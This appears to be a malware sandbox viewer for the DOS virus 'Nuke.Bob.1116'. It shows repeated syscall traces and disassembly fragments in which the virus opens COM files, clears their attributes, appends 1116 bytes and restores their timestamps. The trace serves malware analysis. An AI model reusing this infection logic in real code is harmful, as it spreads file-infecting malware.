Sample viewer

vx.netlux.org/Virus.DOS.Nuke.Bob.1116

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:09.112884422Z 71 PC: 12b44 | Get current directory
2018-12-17T22:54:09.116745891Z 59 PC: 12b4f | Change current directory
2018-12-17T22:54:09.121160765Z 26 PC: 12c03 | Set disk transfer address
2018-12-17T22:54:09.122625085Z 78 PC: 12c11 | Find first file
2018-12-17T22:54:09.128030792Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:09.132169134Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.136153928Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-17T22:54:09.138017958Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.152539098Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.154190318Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:09.162159776Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.167351115Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.169266995Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.171145268Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.173063663Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.182822766Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.184645685Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.193280646Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.203528096Z 79 PC: 12c25 | Find next file
2018-12-17T22:54:09.206540276Z 61 PC: 12c3d | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:09.214591095Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.221688046Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-17T22:54:09.224389629Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.236464219Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.238218697Z 61 PC: 12ca5 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:09.244720394Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.248676837Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.251240196Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.25377647Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.256745308Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.271834452Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.273348275Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.280942434Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.291275235Z 79 PC: 12c25 | Find next file
2018-12-17T22:54:09.294184194Z 61 PC: 12c3d | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:09.301494587Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-17T22:54:09.309218584Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-17T22:54:09.311578597Z 67 PC: 12c9c | Get or set file attributes
2018-12-17T22:54:09.321704807Z 62 PC: 12ca0 | Close file
2018-12-17T22:54:09.32489925Z 61 PC: 12ca5 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:09.331728127Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:09.334775344Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.338677191Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:54:09.341943123Z 66 PC: 12ce8 | Move file pointer
2018-12-17T22:54:09.34413094Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-17T22:54:09.354055537Z 87 PC: 12d01 | Get or set file date and time
2018-12-17T22:54:09.356076635Z 62 PC: 12d05 | Close file
2018-12-17T22:54:09.36398075Z 67 PC: 12d16 | Get or set file attributes
2018-12-17T22:54:09.37432014Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-17T22:54:09.377964762Z 59 PC: 12d93 | Change current directory
2018-12-17T22:54:09.382190332Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.325634871Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.329775042Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.334083215Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.335374017Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.342486194Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.349246334Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.355910084Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.358255883Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.375229496Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.37706598Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.38387717Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.387834403Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.391626503Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.394975786Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.399378876Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.412217931Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.417990095Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.43104494Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.440785004Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.443375888Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.450887996Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.457935086Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.460358908Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.470809198Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.47335225Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.48003498Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.482929451Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.48644562Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.489066457Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.491050546Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.500736459Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.502712342Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.510721289Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.521361968Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.524420109Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.531101709Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.539075596Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.541821116Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.55204418Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.554602974Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.561258511Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.563979243Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.566705723Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.570075735Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.572258531Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.581351259Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.583650872Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.593165938Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.60357568Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.607056116Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.611139975Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.40850405Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.412194963Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.417011986Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.418146932Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.42427891Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.431275689Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.437723805Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.440066218Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.45646645Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.458441869Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.465276675Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.469069937Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.471557585Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.474952116Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.477772548Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.486871881Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.488237496Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.496587302Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.506329601Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.509121419Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.515945521Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.535775896Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.537505019Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.545788589Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.54870152Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.557237667Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.560077064Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.563406667Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.566281251Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.5683987Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.578336025Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.579857879Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.587398932Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.597833536Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.600526216Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.606972459Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.61412943Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.616345644Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.626471608Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.628910238Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.635586955Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.638512534Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.642002367Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.645132316Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.646840207Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.656433238Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.658393408Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.666125041Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.676308918Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.678867196Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.683538792Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.448418584Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.451870816Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.456059041Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.457432485Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.464531153Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.472621427Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.479398797Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.485430256Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:42.505687349Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:42.508049539Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.523487182Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:42.526421737Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.529154715Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:42.532868341Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:42.534940212Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:42.544381883Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:42.546246515Z 62 PC: 12d05 | Close file
2018-12-25T12:30:42.554049419Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:42.563815174Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:42.566636003Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.574269363Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.580722144Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.587048729Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.597784389Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.60174818Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.613360094Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.620772202Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.627660876Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.630370368Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.634874421Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.644361324Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.646162089Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.65482647Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.664666175Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:42.667292434Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:42.675523778Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:42.682474844Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:42.684960388Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:42.695002193Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:42.698022519Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:42.704742472Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:42.707747264Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:42.711143823Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:42.713932762Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:42.715997467Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:42.725385019Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:42.727081549Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:42.739986494Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:42.751027127Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:42.753086943Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:42.756895973Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:42.954142612Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:42.956889551Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:42.959857672Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:42.961623357Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:42.96946135Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:42.977071785Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:30:42.984553134Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh
0x12c84: je 0x12c7e
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]
0x12c8d: mov byte ptr [si], dl
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: mov dx, si
0x12c96: add dx, 0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax
0x12cad: xchg ax, bx
0x12cae: mov ah, 0x40
2018-12-25T12:30:42.987896435Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:43.009429648Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:43.01154557Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:43.020252256Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:43.027815974Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.030760357Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:43.033824651Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:43.036289728Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:43.046204893Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:43.047676699Z 62 PC: 12d05 | Close file
2018-12-25T12:30:43.056850662Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:43.068858824Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:43.071970591Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.088585047Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.096273942Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.098820118Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.111405337Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.113405249Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.120876068Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.124299281Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.128581322Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.131610844Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.133885873Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.144759111Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.146563718Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.155461081Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.167116638Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:43.16998286Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:43.177125777Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:43.185289633Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:43.187594725Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:43.198918813Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:43.202117239Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:43.209575664Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:43.212647845Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:43.216196366Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:43.219045595Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:43.221272436Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:43.232465285Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:43.234398804Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:43.242967095Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:43.254652864Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
0x12b6e: je 0x12b73
0x12b70: jmp 0x12d88
0x12b73: jmp 0x12d1c
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
0x12b81: in ax, -0x7d
0x12b83: in al, dx
0x12b84: sub al, 0x56
0x12b86: jmp 0x12bf8
0x12b89: mov ah, 0x1a
0x12b8b: lea dx, word ptr [bp - 0x2c]
0x12b8e: int 0x21
0x12b90: mov ah, 0x4e
0x12b92: mov cx, 0x10
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]
2018-12-25T12:30:43.257362673Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:43.261854728Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11460,"SideJobID":0}

.

GIF

Syscalls:

